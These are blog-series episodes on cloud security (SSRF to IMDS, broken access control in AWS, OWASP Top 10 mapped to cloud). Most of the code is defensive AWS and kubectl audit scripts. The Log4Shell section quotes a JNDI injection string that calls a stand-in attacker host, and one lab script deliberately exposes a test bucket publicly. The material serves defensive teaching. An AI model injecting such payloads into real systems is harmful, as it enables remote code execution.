Authentication	None — any HTTP GET works	PUT to `/latest/api/token` required first to obtain a session token
SSRF exploitable	Yes — one HTTP request returns credentials	No — SSRF cannot initiate a PUT before a GET in standard flows
Session token TTL	N/A	1 second to 21,600 seconds (configurable)
Hop limit enforcement	N/A	Enforced on PUT — TTL=1 blocks containers from reaching IMDS
AWS CLI enforcement	`--http-tokens optional` (default on old instances)	`--http-tokens required`
Capital One risk	Present	Eliminated

IMDSv2 Enforcement Commands by Provider

Provider	Enforcement Command	Scope
AWS — running instance	`aws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required --http-put-response-hop-limit 1`	Single instance
AWS — launch template	Add `"MetadataOptions": {"HttpTokens": "required"}` to launch template data	All instances from template
AWS — org SCP	Deny `ec2:RunInstances` where `ec2:MetadataHttpTokens != required`	All accounts in org
AWS — Config rule	`ec2-imdsv2-check` managed rule	Compliance audit
GCP	GCP does not have an unauthenticated IMDS equivalent; Metadata Server requires `Metadata-Flavor: Google` header — this header cannot be set via SSRF in most frameworks	N/A
Azure	Azure IMDS requires `Metadata: true` header — browser/SSRF requests typically cannot set this; additionally, IMDS returns only non-credential metadata by default (credentials via Managed Identity have their own endpoint with additional controls)	N/A

Note on GCP and Azure: Both providers designed their metadata services with SSRF resistance in mind. The Metadata-Flavor: Google and Metadata: true headers must be explicitly set by the calling code — they are not added by default browser or curl requests. This does not make SSRF harmless on GCP/Azure (other metadata is still exposed), but the credential exfiltration path is harder than IMDSv1.

Key Takeaways

IMDSv1 has no authentication: any SSRF in any process running on an EC2 instance — application code, WAF, sidecar, proxy — is sufficient to retrieve the full IAM role credentials; no privilege escalation required
The Capital One breach was not a novel attack: it was a well-known SSRF-to-IMDS chain that had been documented for years before 2019; the industry was slow to enforce IMDSv2 at scale
--http-tokens required is the complete fix for the SSRF-to-IMDS credential chain; the operational cost is near zero; every production EC2 instance should have it; use an SCP to make it org-wide and durable
GuardDuty’s UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration finding is your primary post-exploitation signal but fires 5–15 minutes after the fact — pair it with IAM permission boundaries to limit blast radius and EventBridge rules on S3 data events for real-time alerting
The structural solution eliminates the credential entirely: OIDC workload identity eliminates static credentials on EKS/GKE means pods get scoped, short-lived tokens; the node’s instance role carries no application permissions; even a successful SSRF-to-IMDS attack yields nothing useful

What’s Next

SSRF gets you IAM credentials. But if the attacker is already inside a container — even a legitimate one — the path to the host is different. The credential-theft chain doesn’t apply when the attacker already has code execution inside a pod. EP08 covers Kubernetes container escape: hostPID, hostNetwork, privileged containers, and the kernel-level paths that take an attacker from container to node. The detection angle is where eBPF enters the picture — syscall-level visibility that catches escape attempts before they complete.

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

Broken Access Control in AWS: From Misconfigured S3 to Admin

June 4, 2026 by Vamshi Krishna Santhapuri

Reading Time: 9 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS

TL;DR

Broken access control in AWS is OWASP A01 — the most common cloud security failure, covering IAM wildcards, public S3 buckets, and overly broad trust policies
A public S3 bucket containing 47 million customer records went undetected for six months in an authorized assessment — no GuardDuty finding, no AWS Config alert, because those controls weren’t enabled
The red phase: three commands to identify public buckets, enumerate IAM over-permissions, and test trust policy abuse — all with read-only access on your own account
The blue phase: two AWS Config managed rules and one GuardDuty finding type that cover the majority of A01 findings
The purple phase: deny-based SCPs, bucket public access blocks, and IAM Access Analyzer — structural controls, not monitoring alerts
Cross-series: IAM privilege escalation paths (IAM EP08) and AWS least privilege audit (IAM EP09) go deeper on the IAM layer

OWASP Mapping: A01 Broken Access Control — primarily. A09 Logging and Monitoring Failures — the six-month detection gap demonstrates A09 as an amplifier of A01.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│              BROKEN ACCESS CONTROL — ATTACK SURFACE                 │
│                                                                     │
│   INTERNET                    AWS ACCOUNT                           │
│                                                                     │
│   Attacker ──────────────▶  S3 bucket (public read)                 │
│                             └── 47M customer records                │
│                                                                     │
│   Attacker ──────────────▶  IAM user with "Action": "*"             │
│   (compromised creds)        └── escalate → admin access            │
│                                                                     │
│   Attacker ──────────────▶  Trust policy: "AWS": "*"                │
│   (any AWS account)          └── assume role from attacker's        │
│                                  account                            │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│                                                                     │
│   DETECTION GAPS (A09 amplifying A01):                              │
│   • S3 public access not in AWS Config rules                        │
│   • GuardDuty not enabled                                           │
│   • No IAM Access Analyzer                                          │
│   • No SCP boundary on public bucket creation                       │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Broken access control in AWS is the infrastructure equivalent of OWASP A01: a principal can reach a resource it should not be able to reach, because the access control decision was either not made or made incorrectly. In the cloud context, this manifests as public S3 buckets, IAM policies with wildcard actions and resources, and trust policies that allow any principal rather than a specific, scoped entity.

The Assessment That Changed My Approach to Access Control Auditing

During an authorized assessment, I found an S3 bucket containing 47 million customer records. The bucket name was generic — no obvious PII signal in the name itself. It was created two years prior by an engineer who was troubleshooting a data pipeline and needed temporary public access to share data with an external partner. The partner relationship ended. The bucket access was never reverted.

The bucket had been public for six months at the time I found it. I checked the AWS Config rules: S3 public access was not in the rule set. GuardDuty was enabled but no finding had fired — GuardDuty generates a Policy:S3/BucketAnonymousAccessGranted finding when public access is enabled, but only if the finding is new during GuardDuty’s monitoring window. The bucket went public before GuardDuty was enabled.

No alert ever fired. Not because the tools couldn’t detect it — because the tools weren’t configured to look.

This is A01 amplified by A09. The broken access control is the public bucket. The six-month window is the logging and monitoring failure.

Red Phase: How Broken Access Control Works in Practice

The red team perspective on broken access control starts with enumeration. What can this principal reach that it shouldn’t be able to reach?

Enumerating Public S3 Buckets

aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    # Check account-level block
    account_block=$(aws s3control get-public-access-block \
      --account-id $(aws sts get-caller-identity --query Account --output text) \
      2>/dev/null | jq -r '.PublicAccessBlockConfiguration.BlockPublicAcls')

    # Check bucket-level policy
    policy=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic')

    # Check bucket ACL
    acl=$(aws s3api get-bucket-acl --bucket "$bucket" 2>/dev/null | \
      jq -r '.Grants[] | select(.Grantee.URI == "http://acs.amazonaws.com/groups/global/AllUsers") | .Permission')

    if [ "$policy" = "true" ] || [ -n "$acl" ]; then
      echo "PUBLIC BUCKET: $bucket (policy_public=$policy, acl_grants=$acl)"
    fi
  done

Enumerating Overly Permissive IAM Policies

# Find all customer-managed policies with wildcard actions
aws iam list-policies --scope Local --query 'Policies[].Arn' --output text | \
  tr '\t' '\n' | \
  while read arn; do
    version=$(aws iam get-policy --policy-arn "$arn" \
      --query 'Policy.DefaultVersionId' --output text)
    doc=$(aws iam get-policy-version --policy-arn "$arn" --version-id "$version" \
      --query 'PolicyVersion.Document' --output json)

    if echo "$doc" | jq -e '.Statement[] | select(.Effect == "Allow" and .Action == "*")' > /dev/null 2>&1; then
      echo "WILDCARD ACTION POLICY: $arn"
      echo "$doc" | jq '.Statement[] | select(.Effect == "Allow" and .Action == "*")'
    fi
  done

Testing Trust Policy Abuse

# Find IAM roles with overly broad trust policies
# Specifically: trust policies that allow any AWS account or service
aws iam list-roles --query 'Roles[].{Name:RoleName,Arn:Arn}' --output json | \
  jq -r '.[].Arn' | \
  while read role_arn; do
    trust=$(aws iam get-role --role-name "$(basename $role_arn)" \
      --query 'Role.AssumeRolePolicyDocument' --output json 2>/dev/null)

    # Check for wildcard principals
    if echo "$trust" | jq -e '.Statement[] | select(.Principal == "*")' > /dev/null 2>&1; then
      echo "WILDCARD TRUST PRINCIPAL: $role_arn"
    fi

    # Check for cross-account trust without conditions
    if echo "$trust" | jq -e '.Statement[] | select(.Principal.AWS | type == "string" and test("arn:aws:iam::[0-9]+:root"))' > /dev/null 2>&1; then
      account_in_trust=$(echo "$trust" | jq -r '.Statement[] | .Principal.AWS // empty' | grep -oP '(?<=arn:aws:iam::)[0-9]+')
      current_account=$(aws sts get-caller-identity --query Account --output text)
      if [ "$account_in_trust" != "$current_account" ]; then
        echo "CROSS-ACCOUNT TRUST (verify scope): $role_arn trusts account $account_in_trust"
      fi
    fi
  done

Simulating S3 Exfiltration (on your own bucket — safe test)

# Create a test bucket, make it public, verify it's accessible without credentials
# Do this in a non-production account only

TEST_BUCKET="purple-team-test-$(date +%s)"
aws s3 mb s3://${TEST_BUCKET} --region us-east-1

# Disable the public access block (simulates the misconfiguration)
aws s3api put-public-access-block \
  --bucket "${TEST_BUCKET}" \
  --public-access-block-configuration \
  "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"

# Add a public-read bucket policy
aws s3api put-bucket-policy --bucket "${TEST_BUCKET}" --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::'"${TEST_BUCKET}"'/*"
  }]
}'

# Put a test file
echo "PURPLE_TEAM_TEST_DATA" | aws s3 cp - s3://${TEST_BUCKET}/test.txt

# Verify it's accessible without credentials
curl -s "https://${TEST_BUCKET}.s3.amazonaws.com/test.txt"
# Should return: PURPLE_TEAM_TEST_DATA

echo ""
echo "Test complete. Clean up:"
echo "aws s3 rb s3://${TEST_BUCKET} --force"

Blue Phase: What Detection Looks Like

What AWS Config Catches

Two managed rules cover the majority of S3 broken access control findings:

# Enable the S3 public access rules in AWS Config
# (requires Config to already be enabled)

# Rule 1: s3-bucket-public-read-prohibited
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-bucket-public-read-prohibited",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED"
  },
  "Scope": {
    "ComplianceResourceTypes": ["AWS::S3::Bucket"]
  }
}'

# Rule 2: s3-account-level-public-access-blocks-periodic
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-account-level-public-access-blocks-periodic",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_ACCOUNT_LEVEL_PUBLIC_ACCESS_BLOCKS_PERIODIC"
  }
}'

# Check current compliance status
aws configservice describe-compliance-by-config-rule \
  --config-rule-names s3-bucket-public-read-prohibited \
  --query 'ComplianceByConfigRules[].{Rule:ConfigRuleName,Compliance:Compliance.ComplianceType}'

What GuardDuty Catches

GuardDuty generates these findings for S3 broken access control:

Finding Type	Trigger	Severity
`Policy:S3/BucketAnonymousAccessGranted`	Bucket policy or ACL grants public read/write	Medium
`Policy:S3/BucketPublicAccessGranted`	Same as above — alternate finding type	Medium
`Discovery:S3/MaliciousIPCaller`	S3 GetObject from a known malicious IP	High

# Query GuardDuty findings for S3 public access violations
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": ["Policy:S3/BucketAnonymousAccessGranted", "Policy:S3/BucketPublicAccessGranted"]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, bucket: .Resource.S3BucketDetails[0].Name, severity: .Severity}'

What IAM Access Analyzer Catches

IAM Access Analyzer continuously analyzes resource policies for external access — S3 buckets, IAM roles, KMS keys, SQS queues, Lambda functions. It generates a finding any time a resource policy grants access to a principal outside the AWS account (or AWS Organization boundary).

# Enable IAM Access Analyzer for the account
aws accessanalyzer create-analyzer \
  --analyzer-name "account-access-analyzer" \
  --type ACCOUNT

# List all active findings (external access granted)
aws accessanalyzer list-findings \
  --analyzer-arn $(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text) \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --query 'findings[].{Resource:resource,Principal:principal,Action:action}' \
  --output table

What the CloudTrail Event Looks Like

When an anonymous user accesses a public S3 object:

{
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "AWSAccount",
    "accountId": "ANONYMOUS_PRINCIPAL",  
    "principalId": "ANONYMOUS_PRINCIPAL"
  },
  "eventTime": "2024-03-15T02:47:00Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "GetObject",
  "requestParameters": {
    "bucketName": "your-bucket-name",
    "key": "customer-data/records.csv"
  },
  "sourceIPAddress": "198.51.100.1",
  "userAgent": "python-requests/2.28.0"
}

The signal: userIdentity.type = "AWSAccount" with accountId = "ANONYMOUS_PRINCIPAL" on a GetObject event. This is a read from an anonymous, unauthenticated principal.

# CloudTrail Insights query (Athena) to find anonymous S3 GetObject events
# Assumes CloudTrail S3 data events are enabled for the bucket

SELECT
  eventTime,
  sourceIPAddress,
  requestParameters.bucketName,
  requestParameters.key,
  userIdentity.type,
  userIdentity.accountId
FROM cloudtrail_logs
WHERE
  eventName = 'GetObject'
  AND userIdentity.type = 'AWSAccount'
  AND userIdentity.accountId = 'ANONYMOUS_PRINCIPAL'
  AND eventTime > current_timestamp - interval '7' day
ORDER BY eventTime DESC
LIMIT 100;

Purple Phase: The Structural Fix

Detection catches broken access control after the fact. The structural fix prevents it from being possible.

Fix 1: Account-Level S3 Public Access Block

This is a single setting that prevents any bucket in the account from becoming public — regardless of bucket policy or ACL. It overrides bucket-level settings.

# Enable account-level S3 public access block
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
  "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Verify
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text)

Fix 2: SCP to Prevent Disabling the Public Access Block

An SCP (Service Control Policy) at the AWS Organizations level that prevents any account from disabling the public access block — even an account administrator.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyS3PublicAccessBlockDisable",
      "Effect": "Deny",
      "Action": [
        "s3:PutBucketPublicAccessBlock",
        "s3:DeletePublicAccessBlock"
      ],
      "Resource": "*",
      "Condition": {
        "ArnNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::*:role/s3-public-access-exception-role"
        }
      }
    }
  ]
}

# Apply the SCP to your organizational unit
aws organizations create-policy \
  --name "DenyS3PublicAccessBlockDisable" \
  --type SERVICE_CONTROL_POLICY \
  --content file://scp-deny-s3-public-access.json \
  --description "Prevents disabling S3 public access block at account level"

Fix 3: IAM Policy Cleanup — Remove Wildcards

For IAM policies with wildcard actions, the fix is least-privilege replacement. This is not a quick operation — it requires analyzing actual usage and scoping to what is actually needed.

# Use IAM Access Analyzer policy generation to generate a least-privilege policy
# based on actual CloudTrail activity for a role
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/your-role-name"
  }' \
  --cloud-trail-details '{
    "accessRole": "arn:aws:iam::123456789012:role/access-analyzer-cloudtrail-role",
    "trailProperties": [{
      "cloudTrailArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/your-trail",
      "regions": ["us-east-1", "us-west-2"],
      "allRegions": false
    }],
    "startTime": "2024-01-01T00:00:00Z",
    "endTime": "2024-03-01T00:00:00Z"
  }'

# Retrieve the generated policy
JOB_ID="<returned-job-id>"
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

For a systematic audit approach, the AWS least privilege audit process in IAM EP09 covers how to move from wildcard policies to scoped permissions methodically across a multi-account environment.

Fix 4: IAM Access Analyzer with Automated Archiving

# Create an archive rule for known-good cross-account access
# (prevents alert fatigue from legitimate cross-account patterns)
aws accessanalyzer create-archive-rule \
  --analyzer-name "account-access-analyzer" \
  --rule-name "archive-legitimate-cross-account" \
  --filter '{
    "principal.AWS": {
      "contains": ["arn:aws:iam::111122223333:role/legitimate-cross-account-role"]
    }
  }'

Run This in Your Own Environment: A01 Audit

Run this in any AWS account you own or have read-only access to audit:

#!/bin/bash
# Purple Team EP04 — Broken Access Control (A01) Audit
# Safe to run with read-only IAM permissions

ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
echo "Auditing account: ${ACCOUNT}"
echo "==============================="

echo ""
echo "[A01-1] S3 Account-Level Public Access Block"
aws s3control get-public-access-block --account-id "${ACCOUNT}" 2>/dev/null || \
  echo "  FINDING: Account-level public access block not configured"

echo ""
echo "[A01-2] S3 Buckets with Public Access"
aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\t' '\n' | \
  while read bucket; do
    status=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic // "false"')
    if [ "$status" = "true" ]; then
      echo "  FINDING: Public bucket: $bucket"
    fi
  done

echo ""
echo "[A01-3] IAM Roles with Wildcard Trust Policies"
aws iam list-roles --query 'Roles[].RoleName' --output text | tr '\t' '\n' | head -50 | \
  while read role; do
    trust=$(aws iam get-role --role-name "$role" \
      --query 'Role.AssumeRolePolicyDocument.Statement' 2>/dev/null)
    if echo "$trust" | jq -e '.[] | select(.Principal == "*")' > /dev/null 2>&1; then
      echo "  FINDING: Wildcard trust principal in role: $role"
    fi
  done

echo ""
echo "[A01-4] IAM Access Analyzer — Active External Access Findings"
ANALYZER=$(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text 2>/dev/null)
if [ -z "$ANALYZER" ]; then
  echo "  FINDING: IAM Access Analyzer not enabled"
else
  aws accessanalyzer list-findings \
    --analyzer-arn "${ANALYZER}" \
    --filter '{"status": {"eq": ["ACTIVE"]}}' \
    --query 'findings[].{Resource:resource,Type:resourceType}' \
    --output table
fi

⚠ Common Mistakes When Fixing Broken Access Control in AWS

Fixing the symptom at the bucket level without the account-level block. If you set RestrictPublicBuckets=true on individual buckets but leave the account-level block unset, the next bucket created by another engineer starts with public access possible again. The account-level block is the structural control; the bucket-level setting is defense-in-depth.

Not enabling CloudTrail S3 data events. CloudTrail management events capture bucket creation and policy changes. They do not capture GetObject and PutObject by default — that requires enabling S3 data events, which adds cost. Without data events, you cannot see who accessed what in a public bucket. If you can’t afford data events on all buckets, enable them on buckets containing sensitive data.

Treating IAM Access Analyzer findings as one-time. Access Analyzer runs continuously. A new resource policy that grants external access generates a new finding. If you archive findings without fixing the underlying policy, you lose visibility. Archive only findings that represent intentional, documented cross-account access.

Confusing “no GuardDuty findings” with “no problem.” GuardDuty’s Policy:S3/BucketAnonymousAccessGranted only fires when access is newly granted during GuardDuty’s monitoring window. A bucket that was made public before GuardDuty was enabled will not generate a finding — GuardDuty does not retroactively scan all bucket policies. Use AWS Config for retroactive compliance checks; use GuardDuty for real-time detection of new violations.

For the full IAM attack chain that broken access control enables — including IAM privilege escalation paths via iam:PassRole — see IAM series EP08. The privilege escalation analysis belongs alongside the access control audit.

Quick Reference

Control	What It Does	AWS Service
Account-level S3 public access block	Prevents any bucket from becoming public	S3 Control
SCP: deny public access block disable	Prevents disabling the account-level block	Organizations
AWS Config: `S3_BUCKET_PUBLIC_READ_PROHIBITED`	Flags buckets that are or become public	AWS Config
GuardDuty: `Policy:S3/BucketAnonymousAccessGranted`	Detects new public access grants	GuardDuty
IAM Access Analyzer	Finds all resources with external access grants	Access Analyzer
CloudTrail S3 data events	Captures GetObject/PutObject for audit	CloudTrail
IAM policy generation	Generates least-privilege policy from actual usage	Access Analyzer

Key Takeaways

Broken access control in AWS (OWASP A01) is the most common cloud security failure — IAM wildcards, public S3, and broad trust policies are the three primary manifestations
A public S3 bucket with 47 million records was active for six months without a single alert — because the detection controls (AWS Config rules, GuardDuty) weren’t enabled to look for it
The structural fix is the account-level S3 public access block enforced by SCP — detection tools catch violations; the SCP prevents the violation from being possible
IAM Access Analyzer provides continuous visibility into every resource that grants external access — enable it in every account
The red phase can be run with read-only permissions against your own account — the audit script above reveals your current A01 exposure in under five minutes
Fixing A01 without enabling the A09 controls (CloudTrail data events, GuardDuty, AWS Config) leaves you blind to whether the fix is working
Use Access Analyzer’s policy generation feature to move from wildcard policies to least-privilege without guessing

What’s Next

EP05 covers MFA fatigue attacks — how the Uber and Okta breaches worked at the authentication layer, how to simulate push-notification fatigue in a test environment, and the structural fix: phishing-resistant MFA using FIDO2 hardware keys. The identity layer is where most cloud compromises start — understanding how push MFA fails is the prerequisite for knowing why hardware keys are the only structural answer.

Get EP05 in your inbox when it publishes → subscribe at linuxcent.com

OWASP Top 10 Mapped to Cloud Infrastructure: Beyond Web Apps

May 19, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → EP03: Cloud security breaches 2020–2025

TL;DR

OWASP Top 10 cloud infrastructure mapping shows that every category has a direct cloud-native equivalent — this is not a web-app-only taxonomy
A01 Broken Access Control = IAM wildcards, public S3, overly permissive trust policies
A07 Authentication Failures = MFA fatigue, session token theft, push-notification abuse
A08 Software/Data Integrity = compromised build pipelines, unsigned container images, secrets in CI/CD
A10 SSRF = EC2 metadata endpoint abuse, IMDSv1 credential theft (the Capital One attack vector)
Every major cloud breach 2020–2025 lands in one of these ten categories — the taxonomy was always infrastructure-applicable

OWASP Mapping: All categories — A01 through A10. This episode is the reference map for the entire series.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│           OWASP TOP 10 → CLOUD INFRASTRUCTURE MAPPING              │
│                                                                     │
│  OWASP (2021)              CLOUD EQUIVALENT          REAL BREACH    │
│  ─────────────────────────────────────────────────────────────────  │
│  A01 Broken Access Ctrl  → IAM wildcards, public S3  Capital One    │
│  A02 Cryptographic Fail  → Plaintext secrets, weak   CircleCI       │
│                            KMS config                               │
│  A03 Injection           → Log4j JNDI, SSRF as       Log4Shell      │
│                            injection variant                        │
│  A04 Insecure Design     → --privileged containers   runc CVEs      │
│                            no seccomp/AppArmor                      │
│  A05 Security Misconfig  → K8s RBAC defaults, open   Multiple       │
│                            etcd ports                               │
│  A06 Vulnerable Comps    → Transitive deps, outdated  XZ Utils      │
│                            base images                              │
│  A07 Auth Failures       → MFA fatigue, stolen        Uber, Okta    │
│                            session tokens                           │
│  A08 SW/Data Integrity   → Unsigned artifacts,        SolarWinds    │
│                            compromised pipelines                    │
│  A09 Logging/Monitoring  → Missing CloudTrail,        Most          │
│                            no workload telemetry                    │
│  A10 SSRF                → EC2 IMDS abuse, metadata  Capital One    │
│                            credential theft                         │
└─────────────────────────────────────────────────────────────────────┘

OWASP Top 10 cloud infrastructure mapping is not a translation exercise — it is a recognition that the same classes of failure that compromise web applications also compromise cloud infrastructure, Kubernetes clusters, and CI/CD pipelines. The language shifts; the attack classes don’t.

Why Engineers Treat OWASP as a Web-App-Only Concern

I kept hearing OWASP Top 10 in web application security reviews. The AppSec team ran it through their checklist. The infrastructure team shrugged — “that’s for the developers.” Then I looked at the actual cloud breaches: Capital One, Uber, CircleCI, SolarWinds. Every one of them mapped to an OWASP category.

The confusion comes from OWASP’s origins. The project started in 2001 focused on web application vulnerabilities. SQL injection, XSS, broken authentication against HTTP endpoints. The cloud and container ecosystem didn’t exist. So the examples stayed web-application-centric even as the underlying failure classes proved universal.

The 2021 OWASP Top 10 update is more abstracted than its predecessors — intentionally. “Broken Access Control” doesn’t say “SQL injection.” It says access control. That applies to every IAM policy that has "Action": "*" where it shouldn’t.

This episode makes the mapping explicit. One OWASP category at a time.

A01: Broken Access Control — IAM Wildcards and Public S3

Web equivalent: A user can access other users’ records by modifying the URL parameter.

Cloud equivalent: An IAM role with "Action": "*" on "Resource": "*". An S3 bucket with public read. A cross-account trust policy that allows any principal in the account, not just a specific role.

Broken access control in cloud infrastructure means the principal can reach a resource it should not be able to reach, because the access control decision was not made or was made incorrectly.

The Capital One breach (2019, disclosed publicly) is the canonical example. A WAF running on EC2 had an IAM role attached. That role had permissions to list and retrieve objects from S3 buckets. SSRF against the WAF reached the EC2 metadata endpoint and retrieved the IAM role credentials. Those credentials then accessed 100 million customer records. The SSRF was A10. The fact that the WAF had access to customer data S3 buckets was A01.

aws s3control get-public-access-block --account-id $(aws sts get-caller-identity --query Account --output text)

# Find buckets that override the account-level block
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    result=$(aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null)
    if echo "$result" | grep -q '"BlockPublicAcls": false'; then
      echo "PUBLIC ACCESS NOT BLOCKED: $bucket"
    fi
  done

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

Web equivalent: Passwords stored as MD5 hashes. Credit card numbers in plaintext in the database.

Cloud equivalent: DATABASE_URL=postgres://user:password@host/db in a .env file committed to a public repository. An S3 bucket with sensitive data where server-side encryption is not enforced. KMS key policies that allow kms:Decrypt to any principal in the account.

Cryptographic failures in the cloud are less about broken algorithms and more about secrets that aren’t secret. The CircleCI breach (January 2023) exposed customer secrets — API tokens, AWS credentials, private keys — that customers had stored in CircleCI’s environment variables. The attacker compromised CircleCI’s infrastructure and exfiltrated those secrets. The cryptographic failure was that secrets were stored in a way that could be exfiltrated when the platform was compromised, rather than being bound to hardware or using short-lived credentials that couldn’t be replayed.

# Check if default EBS encryption is enabled (prevents data at rest failures)
aws ec2 get-ebs-encryption-by-default --region us-east-1

# Check for S3 buckets without default encryption
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    enc=$(aws s3api get-bucket-encryption --bucket "$bucket" 2>/dev/null)
    if [ -z "$enc" ]; then
      echo "NO DEFAULT ENCRYPTION: $bucket"
    fi
  done

A03: Injection — Log4Shell and SSRF as Injection Variants

Web equivalent: SQL injection via unsanitized query parameters.

Cloud equivalent: Log4Shell (CVE-2021-44228) used JNDI lookup injection via HTTP headers to execute arbitrary code in Java applications. SSRF (Server-Side Request Forgery) is an injection variant where attacker-controlled input causes the server to make requests to internal endpoints — including http://169.254.169.254/latest/meta-data/.

Log4Shell (December 2021) demonstrated injection against infrastructure directly. The User-Agent or X-Forwarded-For header contained ${jndi:ldap://attacker.com/exploit}. The logging framework evaluated it. The outcome was remote code execution on any Java application using Log4j 2.x.

The fix was not “validate user input better.” The fix was patching Log4j and — for SSRF — enforcing IMDSv2 (which requires a PUT request with a session token that a naive SSRF cannot produce).

# Check if all EC2 instances require IMDSv2 (prevents SSRF-to-metadata attacks)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{ID:InstanceId,IMDSv2:MetadataOptions.HttpTokens}' \
  --output table
# Desired: HttpTokens = "required" for all instances

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

Web equivalent: Application architecture where any authenticated user can reach administrative functions without additional authorization checks.

Cloud equivalent: A container deployed with --privileged: true or allowPrivilegeEscalation: true. A Kubernetes pod without securityContext restricting capabilities. A cluster with no admission controller enforcing pod security standards.

Insecure design in the container context means the security controls that should prevent container breakout were never there. They weren’t removed — they were never designed in. The kernel doesn’t enforce namespace isolation when a container has CAP_SYS_ADMIN. The attacker doesn’t exploit a vulnerability — they use capabilities the design granted.

# Find pods running as root or with privileged flag
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    select(
      (.spec.containers[].securityContext.privileged == true) or
      (.spec.securityContext.runAsNonRoot != true)
    ) | 
    "\(.metadata.namespace)/\(.metadata.name)"'

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

Web equivalent: Default admin credentials not changed. Directory listing enabled on the web server.

Cloud equivalent: kubectl access with cluster-admin ClusterRoleBinding for the default service account. etcd port 2379 accessible from the pod network. AWS security groups with 0.0.0.0/0 on port 22.

Security misconfiguration in Kubernetes is particularly common because the defaults in older Kubernetes versions were not secure-by-default. The default service account in each namespace mounts a service account token that can authenticate to the API server. In clusters without RBAC properly configured, that token can enumerate and modify resources.

# Check what the default service account can do in a namespace
kubectl auth can-i --list --as=system:serviceaccount:default:default -n default

# Find ClusterRoleBindings that bind cluster-admin to non-system subjects
kubectl get clusterrolebindings -o json | \
  jq '.items[] | 
    select(.roleRef.name == "cluster-admin") | 
    {name: .metadata.name, subjects: .subjects}'

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

Web equivalent: An npm package in the dependency tree has a known CVE. The application ships with an outdated version of OpenSSL.

Cloud equivalent: A container base image built from ubuntu:20.04 six months ago, now carrying 47 critical CVEs in installed packages. A Lambda function with a vendored boto3 version that has a known vulnerability. XZ Utils (CVE-2024-3094) — a backdoor inserted into the release tarball of a compression library present in almost every major Linux distribution.

XZ Utils is the defining example of this category in the infrastructure context. The attack was supply chain: two years of social engineering against a maintainer, gaining commit access, inserting a backdoor in the release tarball rather than the source repository (so source audits wouldn’t catch it). The XZ backdoor targeted SSH servers on systems using systemd — it would have given the attacker remote code execution on SSH servers across Fedora, Debian, and Ubuntu before it was caught five weeks before broad distribution release.

# Scan a container image for known CVEs (requires trivy)
trivy image --severity HIGH,CRITICAL your-registry/your-image:tag

# Check Lambda function runtime versions against AWS's deprecation schedule
aws lambda list-functions \
  --query 'Functions[].{Name:FunctionName,Runtime:Runtime,LastModified:LastModified}' \
  --output table

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

Web equivalent: Session tokens that don’t expire. Password reset links that work indefinitely.

Cloud equivalent: Push-notification MFA that can be exhausted by fatigue attacks. AWS console sessions with 12-hour validity. OAuth tokens stored in browser local storage. SAML assertions that can be replayed.

The Uber breach (September 2022) is the canonical cloud/SaaS example. A contractor’s credentials were obtained via social engineering. The attacker sent repeated Duo push notifications — the contractor rejected them. The attacker then sent a WhatsApp message claiming to be IT support and asking the contractor to accept the next notification. They did. From there, the attacker found a network share containing a PowerShell script with hardcoded admin credentials for Uber’s Thycotic PAM system — full access to the Uber internal network.

